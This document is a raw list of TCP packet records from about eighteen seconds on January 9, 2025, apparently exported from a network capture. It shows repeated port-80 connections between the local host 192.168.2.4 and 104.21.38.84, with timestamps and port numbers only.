Jan 9, 2025 18:13:12.127943039 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.202589989 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.203176022 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.207669973 CET	80	49895	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.207967997 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.208107948 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.208199978 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.208786964 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.212954998 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.565568924 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.570477962 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.766640902 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.815346003 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.937930107 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:12.987243891 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.071099043 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.077969074 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.079498053 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.082879066 CET	80	49902	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.082931995 CET	49902	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.084285021 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.084355116 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.084738970 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.089504004 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.440551996 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.445406914 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.628159046 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.674737930 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.839637041 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.893449068 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.987081051 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.988415956 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.992116928 CET	80	49908	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.992165089 CET	49908	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.993288994 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:13.993349075 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.993465900 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:13.998255968 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.346739054 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.351569891 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.467346907 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.518488884 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.650572062 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.690457106 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.765400887 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.766204119 CET	49920	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.770412922 CET	80	49915	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.770494938 CET	49915	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.771200895 CET	80	49920	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:14.771281958 CET	49920	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.771389008 CET	49920	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:14.776746988 CET	80	49920	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.019294024 CET	49920	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.020232916 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.025115013 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.025254965 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.025357008 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.030165911 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.065387011 CET	80	49920	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.136554956 CET	80	49920	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.136640072 CET	49920	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.140979052 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.145771027 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.145832062 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.145986080 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.151366949 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.378084898 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.383372068 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.383383036 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.487297058 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.502963066 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.507950068 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.534100056 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.767343044 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.768615961 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.815361977 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.815366030 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:15.890587091 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:15.940323114 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.021719933 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.021780014 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.022507906 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.027425051 CET	80	49922	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.027461052 CET	80	49924	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.027498007 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.027499914 CET	49922	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.027520895 CET	49924	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.027559042 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.027673960 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.032932997 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.378078938 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.382978916 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.476577044 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.518480062 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.733390093 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.784095049 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.861592054 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.862406015 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.866569042 CET	80	49929	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.866643906 CET	49929	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.867230892 CET	80	49937	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:16.867316008 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.867583990 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:16.872349024 CET	80	49937	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:17.221734047 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.226552010 CET	80	49937	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:17.312583923 CET	80	49937	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:17.362224102 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.583509922 CET	80	49937	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:17.627943039 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.708959103 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.713881969 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:17.716707945 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.725153923 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:17.729962111 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.081130981 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.086005926 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.317858934 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.362242937 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.524775028 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.565552950 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.641341925 CET	49937	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.643233061 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.644361973 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.648333073 CET	80	49941	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.648480892 CET	49941	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.649260044 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:18.649759054 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.649902105 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:18.654661894 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.003040075 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.009022951 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.112867117 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.159085989 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.290927887 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.331017017 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.408355951 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.408848047 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.413249016 CET	80	49950	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.413733006 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.413800001 CET	49950	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.413835049 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.413937092 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.418661118 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.768532038 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:19.773406982 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.894481897 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:19.940356970 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.071394920 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.112215042 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.186423063 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.187076092 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.191538095 CET	80	49956	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.191737890 CET	49956	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.192176104 CET	80	49962	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.192238092 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.192343950 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.197293043 CET	80	49962	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.549798965 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.554713964 CET	80	49962	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.632492065 CET	80	49962	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.674706936 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.785670996 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.785921097 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.790474892 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.790553093 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.790708065 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.790848970 CET	80	49962	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.790910959 CET	49962	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.795491934 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.921530008 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.926286936 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:20.926366091 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.926479101 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:20.932164907 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.143768072 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.148951054 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.148962021 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.266588926 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.284194946 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.289066076 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.315340996 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.389874935 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.440349102 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.486329079 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.534111023 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.678847075 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.721570969 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.795917034 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.796194077 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.796655893 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.801073074 CET	80	49965	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.801490068 CET	80	49975	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.801502943 CET	80	49968	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:21.801544905 CET	49965	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.801589012 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.801597118 CET	49968	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.801731110 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:21.806479931 CET	80	49975	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.162154913 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.166934967 CET	80	49975	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.251842976 CET	80	49975	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.299734116 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.425674915 CET	80	49975	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.471715927 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.551953077 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.556838989 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.556899071 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.557013988 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.561868906 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:22.909298897 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:22.914200068 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.114377975 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.159332037 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.351877928 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.393466949 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.467706919 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.468148947 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.472696066 CET	80	49980	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.472795010 CET	49980	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.472929001 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.473014116 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.473155975 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.477900982 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.831168890 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:23.835998058 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.931138992 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:23.987201929 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.169910908 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.215076923 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.295928955 CET	49975	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.297612906 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.298258066 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.302694082 CET	80	49987	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.302768946 CET	49987	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.303085089 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.303164005 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.303284883 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.308111906 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.659306049 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.664206982 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.767129898 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.815341949 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:24.924968004 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:24.971718073 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.046014071 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.046510935 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.050997972 CET	80	49994	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.051086903 CET	49994	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.051448107 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.051567078 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.051650047 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.056528091 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.409498930 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.414450884 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.648030043 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.690457106 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:25.892014980 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:25.940366030 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.041522026 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.042648077 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.046560049 CET	80	49999	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.046644926 CET	49999	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.047425985 CET	80	50005	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.047497034 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.053571939 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.058434010 CET	80	50005	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.417900085 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.422882080 CET	80	50005	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.492958069 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.497912884 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.497987986 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.498166084 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.498555899 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.502948999 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.520884991 CET	80	50005	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.521048069 CET	50005	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.800817966 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.805644035 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.806041956 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.806171894 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.810980082 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.846674919 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:26.851771116 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.851946115 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:26.980977058 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.034183979 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.159154892 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.164020061 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.265460014 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.268471956 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.315342903 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.315368891 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.355011940 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.409209967 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.555624008 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.596645117 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.671721935 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.672378063 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.672434092 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.676754951 CET	80	50006	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.676928997 CET	50006	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.677279949 CET	80	50018	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.677340031 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.677345037 CET	80	50010	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:27.677453041 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.677510977 CET	50010	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:27.682248116 CET	80	50018	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.034362078 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.040764093 CET	80	50018	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.152210951 CET	80	50018	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.205944061 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.394387007 CET	80	50018	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.440329075 CET	50018	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.513463020 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.518239021 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.518290997 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.518418074 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.523272991 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.863109112 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:28.869004011 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:28.974652052 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.018486023 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.228713989 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.268501043 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.441781044 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.442442894 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.446871996 CET	80	50024	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.446937084 CET	50024	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.447204113 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.447267056 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.447407961 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.452184916 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.799890041 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:29.804740906 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:29.986092091 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.034111977 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.247826099 CET	80	50030	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:30.299695015 CET	50030	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:30.372931957 CET	50018	80	192.168.2.4	104.21.38.84
